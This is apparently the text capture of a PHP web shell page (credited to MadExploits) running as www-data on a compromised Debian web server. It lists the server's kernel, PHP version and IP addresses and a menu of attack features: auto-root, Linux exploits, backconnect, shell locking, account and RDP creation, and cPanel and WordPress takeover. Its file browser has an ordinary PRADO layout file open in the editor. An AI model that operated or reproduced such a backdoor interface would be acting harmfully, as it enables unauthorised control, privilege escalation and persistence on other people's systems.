Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.186.156
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
framework /
Wsat /
pages /
layout /
[ HOME SHELL ]
Name
Size
Permission
Action
TWsatLayout.php
942
B
-rw-r--r--
TWsatLayout.tpl
2.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TWsatLayout.php
<?php /** * Description of MainLayout * * @author daniels */ class TWsatLayout extends TTemplateControl { public function onLoad($param) { parent::onLoad($param); $this->validateSecurity(); } private function validateSecurity() { if ($this->Session["wsat_password"] !== $this->getService()->getPassword()) { if (!$this->getPage() instanceof TWsatLogin) { $url = $this->Service->constructUrl('TWsatLogin'); $this->Response->redirect($url); } } } public function logout() { $this->Session["wsat_password"] = ""; $url = $this->Service->constructUrl('TWsatLogin'); $this->Response->redirect($url); } }
Close